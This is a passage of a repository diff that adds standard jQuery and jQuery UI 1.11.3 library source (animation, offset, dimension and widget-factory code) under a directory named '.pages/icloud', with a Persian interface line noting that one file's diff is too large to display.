+		if ( hooks && hooks.set ) {
+			hooks.set( this );
+		} else {
+			Tween.propHooks._default.set( this );
+		}
+		return this;
+	}
+};
+
+Tween.prototype.init.prototype = Tween.prototype;
+
+Tween.propHooks = {
+	_default: {
+		get: function( tween ) {
+			var result;
+
+			if ( tween.elem[ tween.prop ] != null &&
+				(!tween.elem.style || tween.elem.style[ tween.prop ] == null) ) {
+				return tween.elem[ tween.prop ];
+			}
+
+			// passing an empty string as a 3rd parameter to .css will automatically
+			// attempt a parseFloat and fallback to a string if the parse fails
+			// so, simple values such as "10px" are parsed to Float.
+			// complex values such as "rotate(1rad)" are returned as is.
+			result = jQuery.css( tween.elem, tween.prop, "" );
+			// Empty strings, null, undefined and "auto" are converted to 0.
+			return !result || result === "auto" ? 0 : result;
+		},
+		set: function( tween ) {
+			// use step hook for back compat - use cssHook if its there - use .style if its
+			// available and use plain properties where available
+			if ( jQuery.fx.step[ tween.prop ] ) {
+				jQuery.fx.step[ tween.prop ]( tween );
+			} else if ( tween.elem.style && ( tween.elem.style[ jQuery.cssProps[ tween.prop ] ] != null || jQuery.cssHooks[ tween.prop ] ) ) {
+				jQuery.style( tween.elem, tween.prop, tween.now + tween.unit );
+			} else {
+				tween.elem[ tween.prop ] = tween.now;
+			}
+		}
+	}
+};
+
+// Support: IE <=9
+// Panic based approach to setting things on disconnected nodes
+
+Tween.propHooks.scrollTop = Tween.propHooks.scrollLeft = {
+	set: function( tween ) {
+		if ( tween.elem.nodeType && tween.elem.parentNode ) {
+			tween.elem[ tween.prop ] = tween.now;
+		}
+	}
+};
+
+jQuery.each([ "toggle", "show", "hide" ], function( i, name ) {
+	var cssFn = jQuery.fn[ name ];
+	jQuery.fn[ name ] = function( speed, easing, callback ) {
+		return speed == null || typeof speed === "boolean" ?
+			cssFn.apply( this, arguments ) :
+			this.animate( genFx( name, true ), speed, easing, callback );
+	};
+});
+
+jQuery.fn.extend({
+	fadeTo: function( speed, to, easing, callback ) {
+
+		// show any hidden elements after setting opacity to 0
+		return this.filter( isHidden ).css( "opacity", 0 ).show()
+
+			// animate to the value specified
+			.end().animate({ opacity: to }, speed, easing, callback );
+	},
+	animate: function( prop, speed, easing, callback ) {
+		var empty = jQuery.isEmptyObject( prop ),
+			optall = jQuery.speed( speed, easing, callback ),
+			doAnimation = function() {
+				// Operate on a copy of prop so per-property easing won't be lost
+				var anim = Animation( this, jQuery.extend( {}, prop ), optall );
+
+				// Empty animations, or finishing resolves immediately
+				if ( empty || jQuery._data( this, "finish" ) ) {
+					anim.stop( true );
+				}
+			};
+			doAnimation.finish = doAnimation;
+
+		return empty || optall.queue === false ?
+			this.each( doAnimation ) :
+			this.queue( optall.queue, doAnimation );
+	},
+	stop: function( type, clearQueue, gotoEnd ) {
+		var stopQueue = function( hooks ) {
+			var stop = hooks.stop;
+			delete hooks.stop;
+			stop( gotoEnd );
+		};
+
+		if ( typeof type !== "string" ) {
+			gotoEnd = clearQueue;
+			clearQueue = type;
+			type = undefined;
+		}
+		if ( clearQueue && type !== false ) {
+			this.queue( type || "fx", [] );
+		}
+
+		return this.each(function() {
+			var dequeue = true,
+				index = type != null && type + "queueHooks",
+				timers = jQuery.timers,
+				data = jQuery._data( this );
+
+			if ( index ) {
+				if ( data[ index ] && data[ index ].stop ) {
+					stopQueue( data[ index ] );
+				}
+			} else {
+				for ( index in data ) {
+					if ( data[ index ] && data[ index ].stop && rrun.test( index ) ) {
+						stopQueue( data[ index ] );
+					}
+				}
+			}
+
+			for ( index = timers.length; index--; ) {
+				if ( timers[ index ].elem === this && (type == null || timers[ index ].queue === type) ) {
+					timers[ index ].anim.stop( gotoEnd );
+					dequeue = false;
+					timers.splice( index, 1 );
+				}
+			}
+
+			// start the next in the queue if the last step wasn't forced
+			// timers currently will call their complete callbacks, which will dequeue
+			// but only if they were gotoEnd
+			if ( dequeue || !gotoEnd ) {
+				jQuery.dequeue( this, type );
+			}
+		});
+	},
+	finish: function( type ) {
+		if ( type !== false ) {
+			type = type || "fx";
+		}
+		return this.each(function() {
+			var index,
+				data = jQuery._data( this ),
+				queue = data[ type + "queue" ],
+				hooks = data[ type + "queueHooks" ],
+				timers = jQuery.timers,
+				length = queue ? queue.length : 0;
+
+			// enable finishing flag on private data
+			data.finish = true;
+
+			// empty the queue first
+			jQuery.queue( this, type, [] );
+
+			if ( hooks && hooks.stop ) {
+				hooks.stop.call( this, true );
+			}
+
+			// look for any active animations, and finish them
+			for ( index = timers.length; index--; ) {
+				if ( timers[ index ].elem === this && timers[ index ].queue === type ) {
+					timers[ index ].anim.stop( true );
+					timers.splice( index, 1 );
+				}
+			}
+
+			// look for any animations in the old queue and finish them
+			for ( index = 0; index < length; index++ ) {
+				if ( queue[ index ] && queue[ index ].finish ) {
+					queue[ index ].finish.call( this );
+				}
+			}
+
+			// turn off finishing flag
+			delete data.finish;
+		});
+	}
+});
+
+// Generate parameters to create a standard animation
+function genFx( type, includeWidth ) {
+	var which,
+		attrs = { height: type },
+		i = 0;
+
+	// if we include width, step value is 1 to do all cssExpand values,
+	// if we don't include width, step value is 2 to skip over Left and Right
+	includeWidth = includeWidth? 1 : 0;
+	for( ; i < 4 ; i += 2 - includeWidth ) {
+		which = cssExpand[ i ];
+		attrs[ "margin" + which ] = attrs[ "padding" + which ] = type;
+	}
+
+	if ( includeWidth ) {
+		attrs.opacity = attrs.width = type;
+	}
+
+	return attrs;
+}
+
+// Generate shortcuts for custom animations
+jQuery.each({
+	slideDown: genFx("show"),
+	slideUp: genFx("hide"),
+	slideToggle: genFx("toggle"),
+	fadeIn: { opacity: "show" },
+	fadeOut: { opacity: "hide" },
+	fadeToggle: { opacity: "toggle" }
+}, function( name, props ) {
+	jQuery.fn[ name ] = function( speed, easing, callback ) {
+		return this.animate( props, speed, easing, callback );
+	};
+});
+
+jQuery.speed = function( speed, easing, fn ) {
+	var opt = speed && typeof speed === "object" ? jQuery.extend( {}, speed ) : {
+		complete: fn || !fn && easing ||
+			jQuery.isFunction( speed ) && speed,
+		duration: speed,
+		easing: fn && easing || easing && !jQuery.isFunction( easing ) && easing
+	};
+
+	opt.duration = jQuery.fx.off ? 0 : typeof opt.duration === "number" ? opt.duration :
+		opt.duration in jQuery.fx.speeds ? jQuery.fx.speeds[ opt.duration ] : jQuery.fx.speeds._default;
+
+	// normalize opt.queue - true/undefined/null -> "fx"
+	if ( opt.queue == null || opt.queue === true ) {
+		opt.queue = "fx";
+	}
+
+	// Queueing
+	opt.old = opt.complete;
+
+	opt.complete = function() {
+		if ( jQuery.isFunction( opt.old ) ) {
+			opt.old.call( this );
+		}
+
+		if ( opt.queue ) {
+			jQuery.dequeue( this, opt.queue );
+		}
+	};
+
+	return opt;
+};
+
+jQuery.easing = {
+	linear: function( p ) {
+		return p;
+	},
+	swing: function( p ) {
+		return 0.5 - Math.cos( p*Math.PI ) / 2;
+	}
+};
+
+jQuery.timers = [];
+jQuery.fx = Tween.prototype.init;
+jQuery.fx.tick = function() {
+	var timer,
+		timers = jQuery.timers,
+		i = 0;
+
+	fxNow = jQuery.now();
+
+	for ( ; i < timers.length; i++ ) {
+		timer = timers[ i ];
+		// Checks the timer has not already been removed
+		if ( !timer() && timers[ i ] === timer ) {
+			timers.splice( i--, 1 );
+		}
+	}
+
+	if ( !timers.length ) {
+		jQuery.fx.stop();
+	}
+	fxNow = undefined;
+};
+
+jQuery.fx.timer = function( timer ) {
+	if ( timer() && jQuery.timers.push( timer ) ) {
+		jQuery.fx.start();
+	}
+};
+
+jQuery.fx.interval = 13;
+
+jQuery.fx.start = function() {
+	if ( !timerId ) {
+		timerId = setInterval( jQuery.fx.tick, jQuery.fx.interval );
+	}
+};
+
+jQuery.fx.stop = function() {
+	clearInterval( timerId );
+	timerId = null;
+};
+
+jQuery.fx.speeds = {
+	slow: 600,
+	fast: 200,
+	// Default speed
+	_default: 400
+};
+
+// Back Compat <1.8 extension point
+jQuery.fx.step = {};
+
+if ( jQuery.expr && jQuery.expr.filters ) {
+	jQuery.expr.filters.animated = function( elem ) {
+		return jQuery.grep(jQuery.timers, function( fn ) {
+			return elem === fn.elem;
+		}).length;
+	};
+}
+jQuery.fn.offset = function( options ) {
+	if ( arguments.length ) {
+		return options === undefined ?
+			this :
+			this.each(function( i ) {
+				jQuery.offset.setOffset( this, options, i );
+			});
+	}
+
+	var docElem, win,
+		box = { top: 0, left: 0 },
+		elem = this[ 0 ],
+		doc = elem && elem.ownerDocument;
+
+	if ( !doc ) {
+		return;
+	}
+
+	docElem = doc.documentElement;
+
+	// Make sure it's not a disconnected DOM node
+	if ( !jQuery.contains( docElem, elem ) ) {
+		return box;
+	}
+
+	// If we don't have gBCR, just use 0,0 rather than error
+	// BlackBerry 5, iOS 3 (original iPhone)
+	if ( typeof elem.getBoundingClientRect !== core_strundefined ) {
+		box = elem.getBoundingClientRect();
+	}
+	win = getWindow( doc );
+	return {
+		top: box.top  + ( win.pageYOffset || docElem.scrollTop )  - ( docElem.clientTop  || 0 ),
+		left: box.left + ( win.pageXOffset || docElem.scrollLeft ) - ( docElem.clientLeft || 0 )
+	};
+};
+
+jQuery.offset = {
+
+	setOffset: function( elem, options, i ) {
+		var position = jQuery.css( elem, "position" );
+
+		// set position first, in-case top/left are set even on static elem
+		if ( position === "static" ) {
+			elem.style.position = "relative";
+		}
+
+		var curElem = jQuery( elem ),
+			curOffset = curElem.offset(),
+			curCSSTop = jQuery.css( elem, "top" ),
+			curCSSLeft = jQuery.css( elem, "left" ),
+			calculatePosition = ( position === "absolute" || position === "fixed" ) && jQuery.inArray("auto", [curCSSTop, curCSSLeft]) > -1,
+			props = {}, curPosition = {}, curTop, curLeft;
+
+		// need to be able to calculate position if either top or left is auto and position is either absolute or fixed
+		if ( calculatePosition ) {
+			curPosition = curElem.position();
+			curTop = curPosition.top;
+			curLeft = curPosition.left;
+		} else {
+			curTop = parseFloat( curCSSTop ) || 0;
+			curLeft = parseFloat( curCSSLeft ) || 0;
+		}
+
+		if ( jQuery.isFunction( options ) ) {
+			options = options.call( elem, i, curOffset );
+		}
+
+		if ( options.top != null ) {
+			props.top = ( options.top - curOffset.top ) + curTop;
+		}
+		if ( options.left != null ) {
+			props.left = ( options.left - curOffset.left ) + curLeft;
+		}
+
+		if ( "using" in options ) {
+			options.using.call( elem, props );
+		} else {
+			curElem.css( props );
+		}
+	}
+};
+
+
+jQuery.fn.extend({
+
+	position: function() {
+		if ( !this[ 0 ] ) {
+			return;
+		}
+
+		var offsetParent, offset,
+			parentOffset = { top: 0, left: 0 },
+			elem = this[ 0 ];
+
+		// fixed elements are offset from window (parentOffset = {top:0, left: 0}, because it is it's only offset parent
+		if ( jQuery.css( elem, "position" ) === "fixed" ) {
+			// we assume that getBoundingClientRect is available when computed position is fixed
+			offset = elem.getBoundingClientRect();
+		} else {
+			// Get *real* offsetParent
+			offsetParent = this.offsetParent();
+
+			// Get correct offsets
+			offset = this.offset();
+			if ( !jQuery.nodeName( offsetParent[ 0 ], "html" ) ) {
+				parentOffset = offsetParent.offset();
+			}
+
+			// Add offsetParent borders
+			parentOffset.top  += jQuery.css( offsetParent[ 0 ], "borderTopWidth", true );
+			parentOffset.left += jQuery.css( offsetParent[ 0 ], "borderLeftWidth", true );
+		}
+
+		// Subtract parent offsets and element margins
+		// note: when an element has margin: auto the offsetLeft and marginLeft
+		// are the same in Safari causing offset.left to incorrectly be 0
+		return {
+			top:  offset.top  - parentOffset.top - jQuery.css( elem, "marginTop", true ),
+			left: offset.left - parentOffset.left - jQuery.css( elem, "marginLeft", true)
+		};
+	},
+
+	offsetParent: function() {
+		return this.map(function() {
+			var offsetParent = this.offsetParent || docElem;
+			while ( offsetParent && ( !jQuery.nodeName( offsetParent, "html" ) && jQuery.css( offsetParent, "position") === "static" ) ) {
+				offsetParent = offsetParent.offsetParent;
+			}
+			return offsetParent || docElem;
+		});
+	}
+});
+
+
+// Create scrollLeft and scrollTop methods
+jQuery.each( {scrollLeft: "pageXOffset", scrollTop: "pageYOffset"}, function( method, prop ) {
+	var top = /Y/.test( prop );
+
+	jQuery.fn[ method ] = function( val ) {
+		return jQuery.access( this, function( elem, method, val ) {
+			var win = getWindow( elem );
+
+			if ( val === undefined ) {
+				return win ? (prop in win) ? win[ prop ] :
+					win.document.documentElement[ method ] :
+					elem[ method ];
+			}
+
+			if ( win ) {
+				win.scrollTo(
+					!top ? val : jQuery( win ).scrollLeft(),
+					top ? val : jQuery( win ).scrollTop()
+				);
+
+			} else {
+				elem[ method ] = val;
+			}
+		}, method, val, arguments.length, null );
+	};
+});
+
+function getWindow( elem ) {
+	return jQuery.isWindow( elem ) ?
+		elem :
+		elem.nodeType === 9 ?
+			elem.defaultView || elem.parentWindow :
+			false;
+}
+// Create innerHeight, innerWidth, height, width, outerHeight and outerWidth methods
+jQuery.each( { Height: "height", Width: "width" }, function( name, type ) {
+	jQuery.each( { padding: "inner" + name, content: type, "": "outer" + name }, function( defaultExtra, funcName ) {
+		// margin is only for outerHeight, outerWidth
+		jQuery.fn[ funcName ] = function( margin, value ) {
+			var chainable = arguments.length && ( defaultExtra || typeof margin !== "boolean" ),
+				extra = defaultExtra || ( margin === true || value === true ? "margin" : "border" );
+
+			return jQuery.access( this, function( elem, type, value ) {
+				var doc;
+
+				if ( jQuery.isWindow( elem ) ) {
+					// As of 5/8/2012 this will yield incorrect results for Mobile Safari, but there
+					// isn't a whole lot we can do. See pull request at this URL for discussion:
+					// https://github.com/jquery/jquery/pull/764
+					return elem.document.documentElement[ "client" + name ];
+				}
+
+				// Get document width or height
+				if ( elem.nodeType === 9 ) {
+					doc = elem.documentElement;
+
+					// Either scroll[Width/Height] or offset[Width/Height] or client[Width/Height], whichever is greatest
+					// unfortunately, this causes bug #3838 in IE6/8 only, but there is currently no good, small way to fix it.
+					return Math.max(
+						elem.body[ "scroll" + name ], doc[ "scroll" + name ],
+						elem.body[ "offset" + name ], doc[ "offset" + name ],
+						doc[ "client" + name ]
+					);
+				}
+
+				return value === undefined ?
+					// Get width or height on the element, requesting but not forcing parseFloat
+					jQuery.css( elem, type, extra ) :
+
+					// Set width or height on the element
+					jQuery.style( elem, type, value, extra );
+			}, type, chainable ? margin : undefined, chainable, null );
+		};
+	});
+});
+// Limit scope pollution from any deprecated API
+// (function() {
+
+// The number of elements contained in the matched element set
+jQuery.fn.size = function() {
+	return this.length;
+};
+
+jQuery.fn.andSelf = jQuery.fn.addBack;
+
+// })();
+if ( typeof module === "object" && module && typeof module.exports === "object" ) {
+	// Expose jQuery as module.exports in loaders that implement the Node
+	// module pattern (including browserify). Do not create the global, since
+	// the user will be storing it themselves locally, and globals are frowned
+	// upon in the Node module world.
+	module.exports = jQuery;
+} else {
+	// Otherwise expose jQuery to the global object as usual
+	window.jQuery = window.$ = jQuery;
+
+	// Register as a named AMD module, since jQuery can be concatenated with other
+	// files that may use define, but not via a proper concatenation script that
+	// understands anonymous AMD modules. A named AMD is safest and most robust
+	// way to register. Lowercase jquery is used because AMD module names are
+	// derived from file names, and jQuery is normally delivered in a lowercase
+	// file name. Do this after creating the global so that if an AMD module wants
+	// to call noConflict to hide this version of jQuery, it will work.
+	if ( typeof define === "function" && define.amd ) {
+		define( "jquery", [], function () { return jQuery; } );
+	}
+}
+
+})( window );

تفاوت فایلی نمایش داده نمی شود زیرا این فایل بسیار بزرگ است
+ 516 - 0
.pages/icloud/jquery-ui.css


+ 16608 - 0
.pages/icloud/jquery-ui.js

@@ -0,0 +1,16608 @@
+/*! jQuery UI - v1.11.3 - 2015-02-12
+* http://jqueryui.com
+* Includes: core.js, widget.js, mouse.js, position.js, accordion.js, autocomplete.js, button.js, datepicker.js, dialog.js, draggable.js, droppable.js, effect.js, effect-blind.js, effect-bounce.js, effect-clip.js, effect-drop.js, effect-explode.js, effect-fade.js, effect-fold.js, effect-highlight.js, effect-puff.js, effect-pulsate.js, effect-scale.js, effect-shake.js, effect-size.js, effect-slide.js, effect-transfer.js, menu.js, progressbar.js, resizable.js, selectable.js, selectmenu.js, slider.js, sortable.js, spinner.js, tabs.js, tooltip.js
+* Copyright 2015 jQuery Foundation and other contributors; Licensed MIT */
+
+(function( factory ) {
+	if ( typeof define === "function" && define.amd ) {
+
+		// AMD. Register as an anonymous module.
+		define([ "jquery" ], factory );
+	} else {
+
+		// Browser globals
+		factory( jQuery );
+	}
+}(function( $ ) {
+/*!
+ * jQuery UI Core 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/category/ui-core/
+ */
+
+
+// $.ui might exist from components with no dependencies, e.g., $.ui.position
+$.ui = $.ui || {};
+
+$.extend( $.ui, {
+	version: "1.11.3",
+
+	keyCode: {
+		BACKSPACE: 8,
+		COMMA: 188,
+		DELETE: 46,
+		DOWN: 40,
+		END: 35,
+		ENTER: 13,
+		ESCAPE: 27,
+		HOME: 36,
+		LEFT: 37,
+		PAGE_DOWN: 34,
+		PAGE_UP: 33,
+		PERIOD: 190,
+		RIGHT: 39,
+		SPACE: 32,
+		TAB: 9,
+		UP: 38
+	}
+});
+
+// plugins
+$.fn.extend({
+	scrollParent: function( includeHidden ) {
+		var position = this.css( "position" ),
+			excludeStaticParent = position === "absolute",
+			overflowRegex = includeHidden ? /(auto|scroll|hidden)/ : /(auto|scroll)/,
+			scrollParent = this.parents().filter( function() {
+				var parent = $( this );
+				if ( excludeStaticParent && parent.css( "position" ) === "static" ) {
+					return false;
+				}
+				return overflowRegex.test( parent.css( "overflow" ) + parent.css( "overflow-y" ) + parent.css( "overflow-x" ) );
+			}).eq( 0 );
+
+		return position === "fixed" || !scrollParent.length ? $( this[ 0 ].ownerDocument || document ) : scrollParent;
+	},
+
+	uniqueId: (function() {
+		var uuid = 0;
+
+		return function() {
+			return this.each(function() {
+				if ( !this.id ) {
+					this.id = "ui-id-" + ( ++uuid );
+				}
+			});
+		};
+	})(),
+
+	removeUniqueId: function() {
+		return this.each(function() {
+			if ( /^ui-id-\d+$/.test( this.id ) ) {
+				$( this ).removeAttr( "id" );
+			}
+		});
+	}
+});
+
+// selectors
+function focusable( element, isTabIndexNotNaN ) {
+	var map, mapName, img,
+		nodeName = element.nodeName.toLowerCase();
+	if ( "area" === nodeName ) {
+		map = element.parentNode;
+		mapName = map.name;
+		if ( !element.href || !mapName || map.nodeName.toLowerCase() !== "map" ) {
+			return false;
+		}
+		img = $( "img[usemap='#" + mapName + "']" )[ 0 ];
+		return !!img && visible( img );
+	}
+	return ( /^(input|select|textarea|button|object)$/.test( nodeName ) ?
+		!element.disabled :
+		"a" === nodeName ?
+			element.href || isTabIndexNotNaN :
+			isTabIndexNotNaN) &&
+		// the element and all of its ancestors must be visible
+		visible( element );
+}
+
+function visible( element ) {
+	return $.expr.filters.visible( element ) &&
+		!$( element ).parents().addBack().filter(function() {
+			return $.css( this, "visibility" ) === "hidden";
+		}).length;
+}
+
+$.extend( $.expr[ ":" ], {
+	data: $.expr.createPseudo ?
+		$.expr.createPseudo(function( dataName ) {
+			return function( elem ) {
+				return !!$.data( elem, dataName );
+			};
+		}) :
+		// support: jQuery <1.8
+		function( elem, i, match ) {
+			return !!$.data( elem, match[ 3 ] );
+		},
+
+	focusable: function( element ) {
+		return focusable( element, !isNaN( $.attr( element, "tabindex" ) ) );
+	},
+
+	tabbable: function( element ) {
+		var tabIndex = $.attr( element, "tabindex" ),
+			isTabIndexNaN = isNaN( tabIndex );
+		return ( isTabIndexNaN || tabIndex >= 0 ) && focusable( element, !isTabIndexNaN );
+	}
+});
+
+// support: jQuery <1.8
+if ( !$( "<a>" ).outerWidth( 1 ).jquery ) {
+	$.each( [ "Width", "Height" ], function( i, name ) {
+		var side = name === "Width" ? [ "Left", "Right" ] : [ "Top", "Bottom" ],
+			type = name.toLowerCase(),
+			orig = {
+				innerWidth: $.fn.innerWidth,
+				innerHeight: $.fn.innerHeight,
+				outerWidth: $.fn.outerWidth,
+				outerHeight: $.fn.outerHeight
+			};
+
+		function reduce( elem, size, border, margin ) {
+			$.each( side, function() {
+				size -= parseFloat( $.css( elem, "padding" + this ) ) || 0;
+				if ( border ) {
+					size -= parseFloat( $.css( elem, "border" + this + "Width" ) ) || 0;
+				}
+				if ( margin ) {
+					size -= parseFloat( $.css( elem, "margin" + this ) ) || 0;
+				}
+			});
+			return size;
+		}
+
+		$.fn[ "inner" + name ] = function( size ) {
+			if ( size === undefined ) {
+				return orig[ "inner" + name ].call( this );
+			}
+
+			return this.each(function() {
+				$( this ).css( type, reduce( this, size ) + "px" );
+			});
+		};
+
+		$.fn[ "outer" + name] = function( size, margin ) {
+			if ( typeof size !== "number" ) {
+				return orig[ "outer" + name ].call( this, size );
+			}
+
+			return this.each(function() {
+				$( this).css( type, reduce( this, size, true, margin ) + "px" );
+			});
+		};
+	});
+}
+
+// support: jQuery <1.8
+if ( !$.fn.addBack ) {
+	$.fn.addBack = function( selector ) {
+		return this.add( selector == null ?
+			this.prevObject : this.prevObject.filter( selector )
+		);
+	};
+}
+
+// support: jQuery 1.6.1, 1.6.2 (http://bugs.jquery.com/ticket/9413)
+if ( $( "<a>" ).data( "a-b", "a" ).removeData( "a-b" ).data( "a-b" ) ) {
+	$.fn.removeData = (function( removeData ) {
+		return function( key ) {
+			if ( arguments.length ) {
+				return removeData.call( this, $.camelCase( key ) );
+			} else {
+				return removeData.call( this );
+			}
+		};
+	})( $.fn.removeData );
+}
+
+// deprecated
+$.ui.ie = !!/msie [\w.]+/.exec( navigator.userAgent.toLowerCase() );
+
+$.fn.extend({
+	focus: (function( orig ) {
+		return function( delay, fn ) {
+			return typeof delay === "number" ?
+				this.each(function() {
+					var elem = this;
+					setTimeout(function() {
+						$( elem ).focus();
+						if ( fn ) {
+							fn.call( elem );
+						}
+					}, delay );
+				}) :
+				orig.apply( this, arguments );
+		};
+	})( $.fn.focus ),
+
+	disableSelection: (function() {
+		var eventType = "onselectstart" in document.createElement( "div" ) ?
+			"selectstart" :
+			"mousedown";
+
+		return function() {
+			return this.bind( eventType + ".ui-disableSelection", function( event ) {
+				event.preventDefault();
+			});
+		};
+	})(),
+
+	enableSelection: function() {
+		return this.unbind( ".ui-disableSelection" );
+	},
+
+	zIndex: function( zIndex ) {
+		if ( zIndex !== undefined ) {
+			return this.css( "zIndex", zIndex );
+		}
+
+		if ( this.length ) {
+			var elem = $( this[ 0 ] ), position, value;
+			while ( elem.length && elem[ 0 ] !== document ) {
+				// Ignore z-index if position is set to a value where z-index is ignored by the browser
+				// This makes behavior of this function consistent across browsers
+				// WebKit always returns auto if the element is positioned
+				position = elem.css( "position" );
+				if ( position === "absolute" || position === "relative" || position === "fixed" ) {
+					// IE returns 0 when zIndex is not specified
+					// other browsers return a string
+					// we ignore the case of nested elements with an explicit value of 0
+					// <div style="z-index: -10;"><div style="z-index: 0;"></div></div>
+					value = parseInt( elem.css( "zIndex" ), 10 );
+					if ( !isNaN( value ) && value !== 0 ) {
+						return value;
+					}
+				}
+				elem = elem.parent();
+			}
+		}
+
+		return 0;
+	}
+});
+
+// $.ui.plugin is deprecated. Use $.widget() extensions instead.
+$.ui.plugin = {
+	add: function( module, option, set ) {
+		var i,
+			proto = $.ui[ module ].prototype;
+		for ( i in set ) {
+			proto.plugins[ i ] = proto.plugins[ i ] || [];
+			proto.plugins[ i ].push( [ option, set[ i ] ] );
+		}
+	},
+	call: function( instance, name, args, allowDisconnected ) {
+		var i,
+			set = instance.plugins[ name ];
+
+		if ( !set ) {
+			return;
+		}
+
+		if ( !allowDisconnected && ( !instance.element[ 0 ].parentNode || instance.element[ 0 ].parentNode.nodeType === 11 ) ) {
+			return;
+		}
+
+		for ( i = 0; i < set.length; i++ ) {
+			if ( instance.options[ set[ i ][ 0 ] ] ) {
+				set[ i ][ 1 ].apply( instance.element, args );
+			}
+		}
+	}
+};
+
+
+/*!
+ * jQuery UI Widget 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/jQuery.widget/
+ */
+
+
+var widget_uuid = 0,
+	widget_slice = Array.prototype.slice;
+
+$.cleanData = (function( orig ) {
+	return function( elems ) {
+		var events, elem, i;
+		for ( i = 0; (elem = elems[i]) != null; i++ ) {
+			try {
+
+				// Only trigger remove when necessary to save time
+				events = $._data( elem, "events" );
+				if ( events && events.remove ) {
+					$( elem ).triggerHandler( "remove" );
+				}
+
+			// http://bugs.jquery.com/ticket/8235
+			} catch ( e ) {}
+		}
+		orig( elems );
+	};
+})( $.cleanData );
+
+$.widget = function( name, base, prototype ) {
+	var fullName, existingConstructor, constructor, basePrototype,
+		// proxiedPrototype allows the provided prototype to remain unmodified
+		// so that it can be used as a mixin for multiple widgets (#8876)
+		proxiedPrototype = {},
+		namespace = name.split( "." )[ 0 ];
+
+	name = name.split( "." )[ 1 ];
+	fullName = namespace + "-" + name;
+
+	if ( !prototype ) {
+		prototype = base;
+		base = $.Widget;
+	}
+
+	// create selector for plugin
+	$.expr[ ":" ][ fullName.toLowerCase() ] = function( elem ) {
+		return !!$.data( elem, fullName );
+	};
+
+	$[ namespace ] = $[ namespace ] || {};
+	existingConstructor = $[ namespace ][ name ];
+	constructor = $[ namespace ][ name ] = function( options, element ) {
+		// allow instantiation without "new" keyword
+		if ( !this._createWidget ) {
+			return new constructor( options, element );
+		}
+
+		// allow instantiation without initializing for simple inheritance
+		// must use "new" keyword (the code above always passes args)
+		if ( arguments.length ) {
+			this._createWidget( options, element );
+		}
+	};
+	// extend with the existing constructor to carry over any static properties
+	$.extend( constructor, existingConstructor, {
+		version: prototype.version,
+		// copy the object used to create the prototype in case we need to
+		// redefine the widget later
+		_proto: $.extend( {}, prototype ),
+		// track widgets that inherit from this widget in case this widget is
+		// redefined after a widget inherits from it
+		_childConstructors: []
+	});
+
+	basePrototype = new base();
+	// we need to make the options hash a property directly on the new instance
+	// otherwise we'll modify the options hash on the prototype that we're
+	// inheriting from
+	basePrototype.options = $.widget.extend( {}, basePrototype.options );
+	$.each( prototype, function( prop, value ) {
+		if ( !$.isFunction( value ) ) {
+			proxiedPrototype[ prop ] = value;
+			return;
+		}
+		proxiedPrototype[ prop ] = (function() {
+			var _super = function() {
+					return base.prototype[ prop ].apply( this, arguments );
+				},
+				_superApply = function( args ) {
+					return base.prototype[ prop ].apply( this, args );
+				};
+			return function() {
+				var __super = this._super,
+					__superApply = this._superApply,
+					returnValue;
+
+				this._super = _super;
+				this._superApply = _superApply;
+
+				returnValue = value.apply( this, arguments );
+
+				this._super = __super;
+				this._superApply = __superApply;
+
+				return returnValue;
+			};
+		})();
+	});
+	constructor.prototype = $.widget.extend( basePrototype, {
+		// TODO: remove support for widgetEventPrefix
+		// always use the name + a colon as the prefix, e.g., draggable:start
+		// don't prefix for widgets that aren't DOM-based
+		widgetEventPrefix: existingConstructor ? (basePrototype.widgetEventPrefix || name) : name
+	}, proxiedPrototype, {
+		constructor: constructor,
+		namespace: namespace,
+		widgetName: name,
+		widgetFullName: fullName
+	});
+
+	// If this widget is being redefined then we need to find all widgets that
+	// are inheriting from it and redefine all of them so that they inherit from
+	// the new version of this widget. We're essentially trying to replace one
+	// level in the prototype chain.
+	if ( existingConstructor ) {
+		$.each( existingConstructor._childConstructors, function( i, child ) {
+			var childPrototype = child.prototype;
+
+			// redefine the child widget using the same prototype that was
+			// originally used, but inherit from the new version of the base
+			$.widget( childPrototype.namespace + "." + childPrototype.widgetName, constructor, child._proto );
+		});
+		// remove the list of existing child constructors from the old constructor
+		// so the old child constructors can be garbage collected
+		delete existingConstructor._childConstructors;
+	} else {
+		base._childConstructors.push( constructor );
+	}
+
+	$.widget.bridge( name, constructor );
+
+	return constructor;
+};
+
+$.widget.extend = function( target ) {
+	var input = widget_slice.call( arguments, 1 ),
+		inputIndex = 0,
+		inputLength = input.length,
+		key,
+		value;
+	for ( ; inputIndex < inputLength; inputIndex++ ) {
+		for ( key in input[ inputIndex ] ) {
+			value = input[ inputIndex ][ key ];
+			if ( input[ inputIndex ].hasOwnProperty( key ) && value !== undefined ) {
+				// Clone objects
+				if ( $.isPlainObject( value ) ) {
+					target[ key ] = $.isPlainObject( target[ key ] ) ?
+						$.widget.extend( {}, target[ key ], value ) :
+						// Don't extend strings, arrays, etc. with objects
+						$.widget.extend( {}, value );
+				// Copy everything else by reference
+				} else {
+					target[ key ] = value;
+				}
+			}
+		}
+	}
+	return target;
+};
+
+$.widget.bridge = function( name, object ) {
+	var fullName = object.prototype.widgetFullName || name;
+	$.fn[ name ] = function( options ) {
+		var isMethodCall = typeof options === "string",
+			args = widget_slice.call( arguments, 1 ),
+			returnValue = this;
+
+		if ( isMethodCall ) {
+			this.each(function() {
+				var methodValue,
+					instance = $.data( this, fullName );
+				if ( options === "instance" ) {
+					returnValue = instance;
+					return false;
+				}
+				if ( !instance ) {
+					return $.error( "cannot call methods on " + name + " prior to initialization; " +
+						"attempted to call method '" + options + "'" );
+				}
+				if ( !$.isFunction( instance[options] ) || options.charAt( 0 ) === "_" ) {
+					return $.error( "no such method '" + options + "' for " + name + " widget instance" );
+				}
+				methodValue = instance[ options ].apply( instance, args );
+				if ( methodValue !== instance && methodValue !== undefined ) {
+					returnValue = methodValue && methodValue.jquery ?
+						returnValue.pushStack( methodValue.get() ) :
+						methodValue;
+					return false;
+				}
+			});
+		} else {
+
+			// Allow multiple hashes to be passed on init
+			if ( args.length ) {
+				options = $.widget.extend.apply( null, [ options ].concat(args) );
+			}
+
+			this.each(function() {
+				var instance = $.data( this, fullName );
+				if ( instance ) {
+					instance.option( options || {} );
+					if ( instance._init ) {
+						instance._init();
+					}
+				} else {
